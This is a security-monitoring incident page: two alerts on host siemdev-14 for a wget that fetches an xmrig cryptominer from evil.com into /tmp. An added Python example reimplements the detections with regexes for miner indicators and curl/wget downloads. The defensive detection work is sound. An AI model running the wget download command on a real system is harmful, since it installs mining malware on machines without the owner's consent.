
Incident Overview

Incident ID CINC-20251220-91E6F465
Severity Medium (70)
Status new
Alert Count 2
Host Count 1

Timeline

First Seen 2025-12-20 22:08:37
Last Seen 2025-12-20 22:08:37
Duration 0d 0h 0m
Created 2025-12-20 23:35
Updated 2026-01-13 15:14

Kill Chain Analysis

Observed Tactics: Execution, Command and Control
Techniques: Command and Scripting Interpreter, Ingress Tool Transfer

Affected Hosts (1)

siemdev-14

Related Alerts (2)

Alert 1
Severity High
Status new
Hostname siemdev-14
Tactic Execution
Technique Command and Scripting Interpreter
Command Line wget -q http://evil.com/xmrig -O /tmp/xmrig
Time 12-20 22:08
Description A script was launched with a command line that is often associated with cryptomining software. If this is unexpected, review the process tree.

Alert 2
Severity High
Status new
Hostname siemdev-14
Tactic Command and Control
Technique Ingress Tool Transfer
Command Line wget -q http://evil.com/xmrig -O /tmp/xmrig
Time 12-20 22:08
Description An attempt to download files from the command-line interface was detected on this host. Adversaries often use curl or wget to fetch additional payloads after an initial compromise. Review the event to determine whether malicious files were downloaded or whether this download was expected.
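Both alerts above fire on the same command line: one rule keys on the cryptominer indicator (xmrig) and the other on the curl/wget download, and the SIEM then folds them into one incident per host. The block below is an added example, not code from the incident page or from the product that generated it. It reimplements the two detections as simple rules, runs them over constructed process-execution events (only the first event mirrors the command line on this page; the others are made up to show a benign download and a non-match), aggregates alerts into per-host incidents the way the Incident Overview summarises them, and extracts the dropped-file path an analyst would hash and inspect. Rule names, field names and the miner indicator list are assumptions for illustration.

```python
"""
Added example: reproduce the two alerts on this incident page as detection
rules over process-execution events, then aggregate them per host.
Not the SIEM's own code; rule names, fields and indicators are assumed.
"""
import re
from dataclasses import dataclass

# Constructed sample events. EVENTS[0] mirrors the command line on the page;
# the rest are invented to exercise a benign download and a non-match.
EVENTS = [
    {"host": "siemdev-14", "ts": "2025-12-20 22:08:37",
     "cmd": "wget -q http://evil.com/xmrig -O /tmp/xmrig"},
    {"host": "siemdev-02", "ts": "2025-12-20 22:10:00",
     "cmd": "curl -sSfL https://example.com/setup.sh -o /tmp/setup.sh"},
    {"host": "siemdev-02", "ts": "2025-12-20 22:11:00",
     "cmd": "ls -la /var/log"},
]


@dataclass
class Alert:
    rule: str
    severity: str
    host: str
    tactic: str
    technique: str
    cmd: str
    ts: str


# Rule A (Execution / Command and Scripting Interpreter): command lines that
# carry cryptominer indicators. The indicator list is illustrative, not a
# vendor signature set.
MINER = re.compile(r"(?:xmrig|minerd|cpuminer|--donate-level|stratum\+tcp)", re.I)

# Rule B (Command and Control / Ingress Tool Transfer): curl or wget invoked
# with a URL, i.e. a download from the command-line interface.
INGRESS = re.compile(r"\b(?:curl|wget)\b.*https?://", re.I)


def evaluate(event):
    """Return the list of alerts that fire on one process-execution event."""
    alerts = []
    cmd = event["cmd"]
    if MINER.search(cmd):
        alerts.append(Alert("Cryptomining command line", "High", event["host"],
                            "Execution", "Command and Scripting Interpreter",
                            cmd, event["ts"]))
    if INGRESS.search(cmd):
        alerts.append(Alert("Download from command-line interface", "High",
                            event["host"], "Command and Control",
                            "Ingress Tool Transfer", cmd, event["ts"]))
    return alerts


def build_incidents(events):
    """Group alerts by host into the fields shown in the Incident Overview."""
    incidents = {}
    for ev in events:
        for a in evaluate(ev):
            inc = incidents.setdefault(
                a.host, {"alerts": [], "tactics": set(), "techniques": set()})
            inc["alerts"].append(a)
            inc["tactics"].add(a.tactic)
            inc["techniques"].add(a.technique)
    for inc in incidents.values():
        stamps = sorted(a.ts for a in inc["alerts"])
        inc["first_seen"], inc["last_seen"] = stamps[0], stamps[-1]
        inc["alert_count"] = len(inc["alerts"])
    return incidents


def dropped_path(cmd):
    """Destination file written by a wget/curl command, or None.

    wget writes to -O/--output-document; curl writes to -o/--output
    (curl's -O means remote-name and takes no path, so it is not matched).
    """
    parts = cmd.split()
    if not parts:
        return None
    tool = parts[0].rsplit("/", 1)[-1].lower()
    flags = {"wget": r"-O|--output-document", "curl": r"-o|--output"}.get(tool)
    if flags is None:
        return None
    m = re.search(rf"\s(?:{flags})[ =](\S+)", cmd)
    return m.group(1) if m else None


if __name__ == "__main__":
    for host, inc in build_incidents(EVENTS).items():
        print(host, inc["alert_count"], sorted(inc["tactics"]),
              inc["first_seen"], inc["last_seen"])
        for a in inc["alerts"]:
            print("  ", a.rule, "->", dropped_path(a.cmd))
```

For the event mirroring this page, both rules fire on the single command line, which is why the incident shows two alerts from one host, identical First Seen and Last Seen values, and exactly the two tactics listed. The benign-looking curl download on the second host raises only the Ingress Tool Transfer rule; that is the case the second alert's description asks the analyst to confirm or dismiss by reviewing the event. Whether a downloaded file such as /tmp/xmrig is actually the miner is something to establish from the host (hash of the file, the process tree of whatever executed it), not from the command line alone.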